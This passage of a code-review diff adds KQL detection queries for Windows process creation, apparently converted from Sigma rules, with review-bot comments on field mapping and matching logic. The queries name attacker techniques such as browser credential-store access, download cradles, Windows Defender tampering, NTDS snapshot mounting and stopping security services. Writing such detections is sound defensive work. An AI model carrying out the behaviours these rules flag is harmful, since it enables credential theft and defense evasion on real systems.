and ProcessCommandLine contains "127.0.0.1" and ProcessCommandLine contains " -n ") or (FolderPath endswith "\\PING.EXE" and InitiatingProcessCommandLine contains "\\DismFoDInstall.cmd")))) \ No newline at end of file 
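Review bot: The SYSTEM-user check `AccountName contains "AUTHORI" or AccountName contains "AUTORI"` in the Suspicious SYSTEM User Process Creation hunk is unlikely to ever match, because in the DeviceProcessEvents schema `AccountName` carries only the user part (`system`) while the authority lives in `AccountDomain`; the clause presumably came from Sigma's `User` field, which holds the full `NT AUTHORITY\SYSTEM`. As the clause is ANDed with the rest of the query, the rule as written stays silent; `AccountDomain contains "AUTHORI" or AccountDomain contains "AUTORI"` (or `AccountSid =~ "S-1-5-18"`) restores the intent. The Suspicious TSCON Start as SYSTEM rule on the next line carries the same mapping and needs the same fix. Separately, `matches regex "net\\s+user\\s+"` is case-sensitive unlike the surrounding `contains` operators, so a `(?i)` prefix would keep the selection consistent.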
diff --git a/KQL/rules/windows/process_creation/suspicious_sysvol_domain_group_policy_access.kql b/KQL/rules/windows/process_creation/suspicious_sysvol_domain_group_policy_access.kql
new file mode 100644
index 00000000..8b6a6c94
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_sysvol_domain_group_policy_access.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious SYSVOL Domain Group Policy Access
+// Author: Markus Neis, Jonhnathan Ribeiro, oscd.community
+// Date: 2018-04-09
+// Level: medium
+// Description: Detects Access to Domain Group Policies stored in SYSVOL
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\SYSVOL\\" and ProcessCommandLine contains "\\policies\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_tscon_start_as_system.kql b/KQL/rules/windows/process_creation/suspicious_tscon_start_as_system.kql
new file mode 100644
index 00000000..ad3db279
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_tscon_start_as_system.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious TSCON Start as SYSTEM
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-17
+// Level: high
+// Description: Detects a tscon.exe start as LOCAL SYSTEM
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\tscon.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_ultravnc_execution.kql b/KQL/rules/windows/process_creation/suspicious_ultravnc_execution.kql
new file mode 100644
index 00000000..fc056b7f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_ultravnc_execution.kql
@@ -0,0 +1,10 @@ +// Title: Suspicious UltraVNC Execution +// Author: Bhabesh Raj +// Date: 2022-03-04 +// Level: high +// Description: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group) +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.g0047, attack.t1021.005 + +DeviceProcessEvents +| where ProcessCommandLine contains "-autoreconnect " and ProcessCommandLine contains "-connect " and ProcessCommandLine contains "-id:" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql b/KQL/rules/windows/process_creation/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql new file mode 100644 index 00000000..2e9d881e --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Uninstall of Windows Defender Feature via PowerShell +// Author: yxinmiracle +// Date: 2025-08-22 +// Level: high +// Description: Detects the use of PowerShell with Uninstall-WindowsFeature or Remove-WindowsFeature cmdlets to disable or remove the Windows Defender GUI feature, a common technique used by adversaries to evade defenses. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents +| where ProcessCommandLine contains "Windows-Defender" and (ProcessCommandLine contains "Uninstall-WindowsFeature" or ProcessCommandLine contains "Remove-WindowsFeature") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql b/KQL/rules/windows/process_creation/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql new file mode 100644 index 00000000..d5947d9a --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-14 +// Level: medium +// Description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 +// False Positives: +// - Legitimate usage to restore snapshots +// - Legitimate admin activity + +DeviceProcessEvents +| where ((ProcessCommandLine contains "snapshot" and ProcessCommandLine contains "mount ") or (ProcessCommandLine contains "ac" and ProcessCommandLine contains " i" and ProcessCommandLine contains " ntds")) and (FolderPath endswith "\\ntdsutil.exe" or ProcessVersionInfoOriginalFileName =~ "ntdsutil.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_usage_of_for_loop_with_recursive_directory_search_in_cmd.kql b/KQL/rules/windows/process_creation/suspicious_usage_of_for_loop_with_recursive_directory_search_in_cmd.kql new file mode 100644 index 00000000..29fd1b73 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_usage_of_for_loop_with_recursive_directory_search_in_cmd.kql 
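Review bot: The second alternative in the ntdsutil where-clause, `ProcessCommandLine contains "ac" and ProcessCommandLine contains " i" and ProcessCommandLine contains " ntds"`, is opaque to the next maintainer: the two-character substrings read like a conversion bug rather than a deliberate match on ntdsutil's abbreviated `ac i ntds` (activate instance ntds) command form. A one-line comment above the query would keep it from being "fixed" away, e.g. `// "ac" / " i" / " ntds" match the abbreviated "activate instance ntds" form; the short substrings are only acceptable because they are ANDed with the ntdsutil image/OriginalFileName check`.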
@@ -0,0 +1,12 @@
+// Title: Suspicious Usage of For Loop with Recursive Directory Search in CMD
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2025-11-12
+// Level: medium
+// Description: Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing.
+// This pattern may indicate an attempt to discover and execute system binaries dynamically, for example powershell, a technique sometimes used by attackers to evade detection.
+// This behavior has been observed in various malicious lnk files.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003, attack.defense-evasion, attack.t1027.010
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "for /f" and ProcessCommandLine contains "tokens=" and ProcessCommandLine contains "in (" and ProcessCommandLine contains "dir") or (InitiatingProcessCommandLine contains "for /f" and InitiatingProcessCommandLine contains "tokens=" and InitiatingProcessCommandLine contains "in (" and InitiatingProcessCommandLine contains "dir")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_usage_of_shellexec_rundll.kql b/KQL/rules/windows/process_creation/suspicious_usage_of_shellexec_rundll.kql
new file mode 100644
index 00000000..e2315f37
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_usage_of_shellexec_rundll.kql
@@ -0,0 +1,10 @@ +// Title: Suspicious Usage Of ShellExec_RunDLL +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-01 +// Level: high +// Description: Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ProcessCommandLine contains "ShellExec_RunDLL" and (ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "comspec" or ProcessCommandLine contains "iex" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "odbcconf" or ProcessCommandLine contains "regsvr32") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_use_of_csharp_interactive_console.kql b/KQL/rules/windows/process_creation/suspicious_use_of_csharp_interactive_console.kql new file mode 100644 index 00000000..462ed156 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_use_of_csharp_interactive_console.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Use of CSharp Interactive Console +// Author: Michael R. (@nahamike01) +// Date: 2020-03-08 +// Level: high +// Description: Detects the execution of CSharp interactive console by PowerShell +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1127 +// False Positives: +// - Possible depending on environment. Pair with other factors such as net connections, command-line args, etc. + +DeviceProcessEvents +| where FolderPath endswith "\\csi.exe" and ProcessVersionInfoOriginalFileName =~ "csi.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe") \ No newline at end of file 
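Review bot: The CSharp Interactive Console hunk requires both `FolderPath endswith "\\csi.exe"` and `ProcessVersionInfoOriginalFileName =~ "csi.exe"`, so the rule only fires when the on-disk name and the PE original name agree, whereas sibling rules on this page (the where.exe and ntdsutil rules, for instance) OR the two so that either signal suffices. If the AND is not deliberate, `(FolderPath endswith "\\csi.exe" or ProcessVersionInfoOriginalFileName =~ "csi.exe")` gives the same coverage style as its neighbours. I cannot see whether the upstream Sigma rule ties the two fields together, so this may be a faithful conversion that deserves a comment rather than a change.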
diff --git a/KQL/rules/windows/process_creation/suspicious_use_of_psloglist.kql b/KQL/rules/windows/process_creation/suspicious_use_of_psloglist.kql new file mode 100644 index 00000000..b33a447b --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_use_of_psloglist.kql 
@@ -0,0 +1,13 @@ +// Title: Suspicious Use of PsLogList +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-18 +// Level: medium +// Description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087, attack.t1087.001, attack.t1087.002 +// False Positives: +// - Another tool that uses the command line switches of PsLogList +// - Legitimate use of PsLogList by an administrator + +DeviceProcessEvents +| where (ProcessCommandLine contains " security" or ProcessCommandLine contains " application" or ProcessCommandLine contains " system") and (ProcessCommandLine contains " -d" or ProcessCommandLine contains " /d" or ProcessCommandLine contains " –d" or ProcessCommandLine contains " —d" or ProcessCommandLine contains " ―d" or ProcessCommandLine contains " -x" or ProcessCommandLine contains " /x" or ProcessCommandLine contains " –x" or ProcessCommandLine contains " —x" or ProcessCommandLine contains " ―x" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " –s" or ProcessCommandLine contains " —s" or ProcessCommandLine contains " ―s" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " /c" or ProcessCommandLine contains " –c" or ProcessCommandLine contains " —c" or ProcessCommandLine contains " ―c" or ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g" or ProcessCommandLine contains " –g" or ProcessCommandLine contains " —g" or ProcessCommandLine contains " ―g") and (ProcessVersionInfoOriginalFileName =~ "psloglist.exe" or (FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe")) \ No newline at end of file 
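Review bot: The switch list in the PsLogList where-clause repeats each option with `-`, `/`, an en dash, an em dash and a horizontal bar (`" –d"`, `" —d"`, `" ―d"` and so on), which in a generated file reads like a mojibake artifact and is at risk of being normalised away by an editor or a later conversion run. The pattern is systematic enough to look deliberate (presumably Sigma's windash expansion), so a comment above the query, `// en dash / em dash / horizontal bar variants (U+2013, U+2014, U+2015) are intentional, not an encoding error`, would record the intent for maintainers.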
diff --git a/KQL/rules/windows/process_creation/suspicious_userinit_child_process.kql b/KQL/rules/windows/process_creation/suspicious_userinit_child_process.kql new file mode 100644 index 00000000..fbb6d960 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_userinit_child_process.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Userinit Child Process +// Author: Florian Roth (Nextron Systems), Samir Bousseaden (idea) +// Date: 2019-06-17 +// Level: medium +// Description: Detects a suspicious child process of userinit +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055 +// False Positives: +// - Administrative scripts + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not(((FolderPath endswith "\\explorer.exe" or ProcessVersionInfoOriginalFileName =~ "explorer.exe" or ProcessCommandLine =~ "C:\\Windows\\Explorer.EXE") or ProcessCommandLine contains "\\netlogon\\" or isnull(FolderPath)))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_vboxdrvinst_exe_parameters.kql b/KQL/rules/windows/process_creation/suspicious_vboxdrvinst_exe_parameters.kql new file mode 100644 index 00000000..c8a806ef --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_vboxdrvinst_exe_parameters.kql 
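Review bot: The exclusion `isnull(FolderPath)` at the end of the Suspicious Userinit Child Process query only covers a null column; an absent image path can also arrive as an empty string, which `isnull` does not match and which would then fall through the `not(...)` and alert. `isempty(FolderPath)` covers both null and empty, so `or isempty(FolderPath)` is the safer rendering of the Sigma `Image: null` filter this presumably came from.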
@@ -0,0 +1,14 @@
+// Title: Suspicious VBoxDrvInst.exe Parameters
+// Author: Konstantin Grishchenko, oscd.community
+// Date: 2020-10-06
+// Level: medium
+// Description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file.
+// This allows to create values in the registry and install drivers.
+// For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "driver" and ProcessCommandLine contains "executeinf") and FolderPath endswith "\\VBoxDrvInst.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_velociraptor_child_process.kql b/KQL/rules/windows/process_creation/suspicious_velociraptor_child_process.kql
new file mode 100644
index 00000000..93c86590
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_velociraptor_child_process.kql
@@ -0,0 +1,12 @@ +// Title: Suspicious Velociraptor Child Process +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-08-29 +// Level: high +// Description: Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attacks. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.persistence, attack.defense-evasion, attack.t1219 +// False Positives: +// - Legitimate administrators or incident responders might use Velociraptor to execute scripts or tools. However, the combination of Velociraptor spawning these specific processes with these command lines is suspicious. Tuning may be required to exclude known administrative actions or specific scripts. + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\Velociraptor.exe" and ((ProcessCommandLine contains "msiexec" and ProcessCommandLine contains "/i" and ProcessCommandLine contains "http") or ((ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "IWR " or ProcessCommandLine contains ".DownloadFile" or ProcessCommandLine contains ".DownloadString") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "code.exe" and ProcessCommandLine contains "tunnel" and ProcessCommandLine contains "--accept-server-license-terms")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_vsls_agent_command_with_agentextensionpath_load.kql b/KQL/rules/windows/process_creation/suspicious_vsls_agent_command_with_agentextensionpath_load.kql new file mode 100644 index 00000000..9d5b0e1c --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_vsls_agent_command_with_agentextensionpath_load.kql 
@@ -0,0 +1,12 @@
+// Title: Suspicious Vsls-Agent Command With AgentExtensionPath Load
+// Author: bohops
+// Date: 2022-10-30
+// Level: medium
+// Description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - False positives depend on custom use of vsls-agent.exe
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--agentExtensionPath" and FolderPath endswith "\\vsls-agent.exe") and (not(ProcessCommandLine contains "Microsoft.VisualStudio.LiveShare.Agent."))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/windows/process_creation/suspicious_webdav_client_execution_via_rundll32_exe.kql
new file mode 100644
index 00000000..1e39d40e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_webdav_client_execution_via_rundll32_exe.kql
@@ -0,0 +1,10 @@ +// Title: Suspicious WebDav Client Execution Via Rundll32.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) +// Date: 2023-03-16 +// Level: high +// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397 +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048.003, cve.2023-23397 + +DeviceProcessEvents +| where (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "-s WebClient" and InitiatingProcessFolderPath endswith "\\svchost.exe") and (not((ProcessCommandLine contains "://10." or ProcessCommandLine contains "://192.168." or ProcessCommandLine contains "://172.16." or ProcessCommandLine contains "://172.17." or ProcessCommandLine contains "://172.18." or ProcessCommandLine contains "://172.19." or ProcessCommandLine contains "://172.20." or ProcessCommandLine contains "://172.21." or ProcessCommandLine contains "://172.22." or ProcessCommandLine contains "://172.23." or ProcessCommandLine contains "://172.24." or ProcessCommandLine contains "://172.25." or ProcessCommandLine contains "://172.26." or ProcessCommandLine contains "://172.27." or ProcessCommandLine contains "://172.28." or ProcessCommandLine contains "://172.29." or ProcessCommandLine contains "://172.30." or ProcessCommandLine contains "://172.31." or ProcessCommandLine contains "://127." or ProcessCommandLine contains "://169.254."))) \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/suspicious_where_execution.kql b/KQL/rules/windows/process_creation/suspicious_where_execution.kql new file mode 100644 index 00000000..dea00dd8 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_where_execution.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Where Execution +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-13 +// Level: low +// Description: Adversaries may enumerate browser bookmarks to learn more about compromised hosts. +// Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about +// internal network resources such as servers, tools/dashboards, or other related infrastructure. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1217 + +DeviceProcessEvents +| where (FolderPath endswith "\\where.exe" or ProcessVersionInfoOriginalFileName =~ "where.exe") and (ProcessCommandLine contains "places.sqlite" or ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "formhistory.sqlite" or ProcessCommandLine contains "logins.json" or ProcessCommandLine contains "key4.db" or ProcessCommandLine contains "key3.db" or ProcessCommandLine contains "sessionstore.jsonlz4" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Login Data") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql b/KQL/rules/windows/process_creation/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql new file mode 100644 index 00000000..35bbfec1 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql 
@@ -0,0 +1,12 @@ +// Title: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE +// Author: frack113 +// Date: 2022-02-13 +// Level: medium +// Description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths" or ProcessCommandLine contains "SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Paths") and (ProcessCommandLine contains "ADD " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_DWORD " and ProcessCommandLine contains "/v " and ProcessCommandLine contains "/d " and ProcessCommandLine contains "0") and FolderPath endswith "\\reg.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql b/KQL/rules/windows/process_creation/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql new file mode 100644 index 00000000..dfd7e2e0 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql 
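Review bot: In the Defender folder-exclusion hunk the final `ProcessCommandLine contains "0"` term adds almost nothing, since a lone `0` matches any zero anywhere in the command line (a path such as `Windows10` or a digit in a key name) rather than the exclusion value it is meant to pin, while `/d ` is already required by a separate term. If the intent is the `/d 0` value, `ProcessCommandLine contains "/d 0"` in place of the two separate `/d ` and `0` terms states it precisely; if spacing variants matter, `ProcessCommandLine matches regex "/d\\s+0"` does the same. The split presumably mirrors the upstream rule's separate tokens, so a comment explaining the pairing is the minimum if the terms are kept as they are.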
@@ -0,0 +1,12 @@ +// Title: Suspicious Windows Defender Registry Key Tampering Via Reg.EXE +// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-03-22 +// Level: high +// Description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Rare legitimate use by administrators to test software (should always be investigated) + +DeviceProcessEvents +| where ((FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\")) and (((ProcessCommandLine contains "DisallowExploitProtectionOverride" or ProcessCommandLine contains "EnableControlledFolderAccess" or ProcessCommandLine contains "MpEnablePus" or ProcessCommandLine contains "PUAProtection" or ProcessCommandLine contains "SpynetReporting" or ProcessCommandLine contains "SubmitSamplesConsent" or ProcessCommandLine contains "TamperProtection") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 0")) or ((ProcessCommandLine contains "DisableAccess" or ProcessCommandLine contains "DisableAntiSpyware" or ProcessCommandLine contains "DisableAntiSpywareRealtimeProtection" or ProcessCommandLine contains "DisableAntiVirus" or ProcessCommandLine contains "DisableAntiVirusSignatures" or ProcessCommandLine contains "DisableArchiveScanning" or ProcessCommandLine contains "DisableBehaviorMonitoring" or ProcessCommandLine contains "DisableBlockAtFirstSeen" or ProcessCommandLine contains "DisableCloudProtection" or ProcessCommandLine 
contains "DisableConfig" or ProcessCommandLine contains "DisableEnhancedNotifications" or ProcessCommandLine contains "DisableIntrusionPreventionSystem" or ProcessCommandLine contains "DisableIOAVProtection" or ProcessCommandLine contains "DisableNetworkProtection" or ProcessCommandLine contains "DisableOnAccessProtection" or ProcessCommandLine contains "DisablePrivacyMode" or ProcessCommandLine contains "DisableRealtimeMonitoring" or ProcessCommandLine contains "DisableRoutinelyTakingAction" or ProcessCommandLine contains "DisableScanOnRealtimeEnable" or ProcessCommandLine contains "DisableScriptScanning" or ProcessCommandLine contains "DisableSecurityCenter" or ProcessCommandLine contains "Notification_Suppress" or ProcessCommandLine contains "SignatureDisableUpdateOnStartupWithoutEngine") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 1"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_windows_service_tampering.kql b/KQL/rules/windows/process_creation/suspicious_windows_service_tampering.kql new file mode 100644 index 00000000..9320a3fa --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_windows_service_tampering.kql 
@@ -0,0 +1,12 @@ +// Title: Suspicious Windows Service Tampering +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 , X__Junior (Nextron Systems) +// Date: 2022-09-01 +// Level: high +// Description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1489, attack.t1562.001 +// False Positives: +// - Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry + +DeviceProcessEvents +| where (ProcessCommandLine contains "143Svc" or ProcessCommandLine contains "Acronis VSS Provider" or ProcessCommandLine contains "AcronisAgent" or ProcessCommandLine contains "AcrSch2Svc" or ProcessCommandLine contains "AdobeARMservice" or ProcessCommandLine contains "AHS Service" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "Apache4" or ProcessCommandLine contains "ARSM" or ProcessCommandLine contains "aswBcc" or ProcessCommandLine contains "AteraAgent" or ProcessCommandLine contains "Avast Business Console Client Antivirus Service" or ProcessCommandLine contains "avast! 
Antivirus" or ProcessCommandLine contains "AVG Antivirus" or ProcessCommandLine contains "avgAdminClient" or ProcessCommandLine contains "AvgAdminServer" or ProcessCommandLine contains "AVP1" or ProcessCommandLine contains "BackupExec" or ProcessCommandLine contains "bedbg" or ProcessCommandLine contains "BITS" or ProcessCommandLine contains "BrokerInfrastructure" or ProcessCommandLine contains "CASLicenceServer" or ProcessCommandLine contains "CASWebServer" or ProcessCommandLine contains "Client Agent 7.60" or ProcessCommandLine contains "Core Browsing Protection" or ProcessCommandLine contains "Core Mail Protection" or ProcessCommandLine contains "Core Scanning Server" or ProcessCommandLine contains "DCAgent" or ProcessCommandLine contains "dwmrcs" or ProcessCommandLine contains "EhttpSr" or ProcessCommandLine contains "ekrn" or ProcessCommandLine contains "Enterprise Client Service" or ProcessCommandLine contains "epag" or ProcessCommandLine contains "EPIntegrationService" or ProcessCommandLine contains "EPProtectedService" or ProcessCommandLine contains "EPRedline" or ProcessCommandLine contains "EPSecurityService" or ProcessCommandLine contains "EPUpdateService" or ProcessCommandLine contains "EraserSvc11710" or ProcessCommandLine contains "EsgShKernel" or ProcessCommandLine contains "ESHASRV" or ProcessCommandLine contains "FA_Scheduler" or ProcessCommandLine contains "FirebirdGuardianDefaultInstance" or ProcessCommandLine contains "FirebirdServerDefaultInstance" or ProcessCommandLine contains "FontCache3.0.0.0" or ProcessCommandLine contains "HealthTLService" or ProcessCommandLine contains "hmpalertsvc" or ProcessCommandLine contains "HMS" or ProcessCommandLine contains "HostControllerService" or ProcessCommandLine contains "hvdsvc" or ProcessCommandLine contains "IAStorDataMgrSvc" or ProcessCommandLine contains "IBMHPS" or ProcessCommandLine contains "ibmspsvc" or ProcessCommandLine contains "IISAdmin" or ProcessCommandLine contains "IMANSVC" or 
ProcessCommandLine contains "IMAP4Svc" or ProcessCommandLine contains "instance2" or ProcessCommandLine contains "KAVFS" or ProcessCommandLine contains "KAVFSGT" or ProcessCommandLine contains "kavfsslp" or ProcessCommandLine contains "KeyIso" or ProcessCommandLine contains "klbackupdisk" or ProcessCommandLine contains "klbackupflt" or ProcessCommandLine contains "klflt" or ProcessCommandLine contains "klhk" or ProcessCommandLine contains "KLIF" or ProcessCommandLine contains "klim6" or ProcessCommandLine contains "klkbdflt" or ProcessCommandLine contains "klmouflt" or ProcessCommandLine contains "klnagent" or ProcessCommandLine contains "klpd" or ProcessCommandLine contains "kltap" or ProcessCommandLine contains "KSDE1.0.0" or ProcessCommandLine contains "LogProcessorService" or ProcessCommandLine contains "M8EndpointAgent" or ProcessCommandLine contains "macmnsvc" or ProcessCommandLine contains "masvc" or ProcessCommandLine contains "MBAMService" or ProcessCommandLine contains "MBCloudEA" or ProcessCommandLine contains "MBEndpointAgent" or ProcessCommandLine contains "McAfeeDLPAgentService" or ProcessCommandLine contains "McAfeeEngineService" or ProcessCommandLine contains "MCAFEEEVENTPARSERSRV" or ProcessCommandLine contains "McAfeeFramework" or ProcessCommandLine contains "MCAFEETOMCATSRV530" or ProcessCommandLine contains "McShield" or ProcessCommandLine contains "McTaskManager" or ProcessCommandLine contains "mfefire" or ProcessCommandLine contains "mfemms" or ProcessCommandLine contains "mfevto" or ProcessCommandLine contains "mfevtp" or ProcessCommandLine contains "mfewc" or ProcessCommandLine contains "MMS" or ProcessCommandLine contains "mozyprobackup" or ProcessCommandLine contains "mpssvc" or ProcessCommandLine contains "MSComplianceAudit" or ProcessCommandLine contains "MSDTC" or ProcessCommandLine contains "MsDtsServer" or ProcessCommandLine contains 